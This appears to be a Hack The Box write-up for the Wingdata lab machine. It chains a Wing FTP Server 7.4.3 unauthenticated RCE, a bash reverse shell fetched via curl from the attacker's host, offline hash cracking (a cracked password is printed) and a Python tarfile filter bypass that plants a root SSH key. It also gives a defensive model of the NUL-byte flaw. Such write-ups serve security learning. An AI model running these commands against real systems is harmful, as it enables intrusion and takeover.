
Hack The Box: Wingdata - Writeup

A walkthrough of Wingdata (Easy), exploiting Wing FTP Server 7.4.3 for initial access and escalating to root via Python tarfile filter bypass.

April 21, 2026
Tags: HTB, Linux, Wing FTP Server, RCE, SSH, CVE-2025-4138, Tarfile, Privilege Escalation

1. Reconnaissance

I started with RustScan and version detection:

rustscan -a 10.129.244.106 --ulimit 5000 -- -sC -sV -Pn

Results:

Port    State  Service  Version
22/tcp  open   ssh      OpenSSH 9.2p1 Debian 2+deb12u7
80/tcp  open   http     Apache httpd 2.4.66 (Debian)

HTTP redirected to http://wingdata.htb/, so I added the name to /etc/hosts:

echo "10.129.244.106 wingdata.htb" | sudo tee -a /etc/hosts

2. Web Enumeration

I fuzzed directories first:

ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-directories.txt -u http://wingdata.htb/FUZZ

Findings:

  • assets (301)
  • vendor (301)
  • server-status (403)

Then I moved to virtual host enumeration, filtering out the default vhost response by its word count (-fw 21):

ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://wingdata.htb/ -H "Host: FUZZ.wingdata.htb" -fw 21

Found one valid subdomain:

  • ftp.wingdata.htb

Added it to hosts:

echo "10.129.244.106 ftp.wingdata.htb" | sudo tee -a /etc/hosts

Browsing the subdomain revealed a Wing FTP login page showing:

  • Wing FTP Server v7.4.3

3. Initial Exploitation - Wing FTP RCE

I checked Searchsploit:

searchsploit wing ftp 7.4.3

Relevant result:

  • Wing FTP Server 7.4.3 - Unauthenticated Remote Code Execution (52347.py)

I ran the exploit (saved locally as exploit.py) to validate code execution:

python3 exploit.py -u http://ftp.wingdata.htb -c "whoami"

Output confirmed RCE as:

wingftp

Why this works

The flaw (tracked as CVE-2025-47812) is a null-byte handling mismatch between the server's C code and its Lua backend. The login handler validates the username with C string routines, which stop at the first NUL byte, so a username of anonymous followed by a NUL and a payload authenticates as the anonymous account (present on this host, see anonymous.xml below). The Lua side is length-aware and writes the whole string, payload included, into the session file, which the server later loads as Lua code; the payload calls os.execute, so commands run with the privileges of the service user, wingftp here. An accepted account is the only prerequisite: the exploit is unauthenticated in practice where anonymous login is enabled, and any valid account works otherwise.
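The mismatch is easier to see in a small model. The following is an added illustration of the bug class, not Wing FTP's code: a C-style string view that stops at NUL, a length-aware layer that splices the full value into Lua source, and a hardened check that rejects NUL bytes before any layer sees them. The Lua template, the user set and the crafted username are assumptions for the demo.

```python
# Added model of the bug class behind the Wing FTP login RCE, not the
# product's own code. A NUL-terminated C string API stops at the first
# NUL byte; a length-aware layer (Lua strings) keeps every byte and
# interpolates it into source that is executed later.

KNOWN_USERS = {b"anonymous"}  # constructed: the account the box also exposes


def c_string(raw: bytes) -> bytes:
    """Return what a NUL-terminated C string routine sees of the buffer."""
    nul = raw.find(b"\x00")
    return raw if nul < 0 else raw[:nul]


def c_layer_accepts(username: bytes) -> bool:
    """Model of the credential check: only the bytes before NUL are compared."""
    return c_string(username) in KNOWN_USERS


def lua_session_source(username: bytes) -> bytes:
    """Model of the length-aware layer: the full username is written into a
    Lua session file the server later loads. Template is an assumption."""
    return b'user = "' + username + b'"\n'


def code_outside_literal(session_src: bytes) -> bytes:
    """Bytes that escaped the string literal on the first line, i.e. what Lua
    would parse as statements rather than as the user name."""
    first_line = session_src.split(b"\n", 1)[0]
    _, _, tail = first_line.partition(b'"')        # skip 'user = '
    _, closing, after = tail.partition(b'"')       # up to the literal's end
    return after if closing else b""


def hardened_accepts(username: bytes) -> bool:
    """Fix: refuse NUL bytes up front so every layer sees the same value, and
    compare the whole value rather than a truncated view of it."""
    if b"\x00" in username:
        return False
    return username in KNOWN_USERS


def demo(username: bytes = b'anonymous\x00"; os.execute("id") --') -> dict:
    """Run one username through both layers and the hardened check."""
    src = lua_session_source(username)
    return {
        "c_layer_accepts": c_layer_accepts(username),    # True: sees b"anonymous"
        "session_source": src,                           # payload survives the NUL
        "injected": code_outside_literal(src),           # what Lua would execute
        "hardened_accepts": hardened_accepts(username),  # False: NUL rejected
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key:16s} {value!r}")
```

The point the model makes: the check and the sink disagree about where the string ends, so validation on the truncated view says nothing about what the Lua layer will run. Rejecting NUL bytes at the boundary (or comparing with length-aware routines throughout) removes the disagreement rather than patching one sink.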

4. Getting a Reverse Shell

I hosted a bash reverse shell payload locally:

echo 'bash -i >& /dev/tcp/10.10.15.9/4444 0>&1' > shell.sh
python3 -m http.server 8000

Then executed it through the RCE:

python3 exploit.py -u http://ftp.wingdata.htb -c "curl -s http://10.10.15.9:8000/shell.sh | bash"

Listener caught a shell as wingftp.

5. Post-Exploitation Enumeration as wingftp

Inside /opt/wftpserver I found Wing FTP files and keys:

  • wftp_default_ssh.key
  • Data directory with account data

I checked the data directory:

cd /opt/wftpserver/Data
ls

Admin account data:

cat _ADMINISTRATOR/admins.xml

This gave an admin hash, but cracking that was not needed.

Then I looked at domain user files:

ls /opt/wftpserver/Data/1/users

Users included:

  • anonymous.xml
  • john.xml
  • maria.xml
  • steve.xml
  • wacky.xml

From wacky.xml I extracted the stored password hash and cracked it offline in Wing FTP's salted hash format.

Cracked credential:

wacky: !#7Blushing^*Bride5

6. SSH Access as wacky

I authenticated over SSH:

ssh wacky@wingdata.htb

Confirmed shell as wacky and retrieved user flag:

8b0a99de4e332a291e1b71e2d7cdbc93

7. Privilege Escalation to root

Sudo permissions for wacky:

sudo -l

Allowed command:

(root) NOPASSWD: /usr/local/bin/python3 /opt/backup_clients/restore_backup_clients.py *

I reviewed the script. The risky part is the extraction step:

with tarfile.open(backup_path, "r") as tar:
    tar.extractall(path=staging_dir, filter="data")

The wildcard in the sudo rule lets wacky pick the archive, and the script extracts it as root. The "data" filter is meant to stop exactly this kind of abuse: it rejects absolute paths, parent-directory traversal and links whose target resolves outside staging_dir. The rule pins /usr/local/bin/python3 rather than Debian's /usr/bin/python3, so the first thing to check is its version (/usr/local/bin/python3 --version): the tarfile filter bypass tracked as CVE-2025-4138 lets a chain of symlink members, each of which passes the filter's per-member target check, combine so that a later member written through the chain lands outside the destination. CPython closed it in the June 2025 security releases (3.13.4, 3.12.11, 3.11.13, 3.10.18, 3.9.23); the build on this box was older, which is what made the route usable here.

Exploit strategy

  1. Generate an SSH key pair.
  2. Create a malicious tar that writes the public key into /root/.ssh/authorized_keys.
  3. Run the restore script with sudo.
  4. SSH into localhost as root using the private key.

Generate key:

ssh-keygen -t ed25519 -f wingdata_key -N ""

Build the exploit tar. This exploit.py is a separate crafting script, not the Wing FTP exploit from step 3; -o names the output archive, -p the payload type and -P the public key to embed:

python3 exploit.py -o backup_777.tar -p ssh-key -P wingdata_key.pub

Place and trigger restore:

mv backup_777.tar /opt/backup_clients/backups/
sudo /usr/local/bin/python3 /opt/backup_clients/restore_backup_clients.py -b backup_777.tar -r restore_pwn

SSH as root:

ssh -i wingdata_key root@127.0.0.1

Root shell obtained successfully.

8. Flags

  • User flag: 8b0a99de4e332a291e1b71e2d7cdbc93
  • Root flag: Retrieved from /root/root.txt after root access

9. Attack Chain Summary

This machine was solved by chaining:

  1. VHost discovery (ftp.wingdata.htb).
  2. Unauthenticated RCE in Wing FTP Server 7.4.3.
  3. Credential discovery and hash cracking for user wacky.
  4. SSH pivot from service user to real system user.
  5. Sudo abuse in backup restore workflow using tar extraction bypass to write root authorized keys.

Wingdata is a great example of how one exposed vulnerable service plus weak backup handling can lead to full system compromise.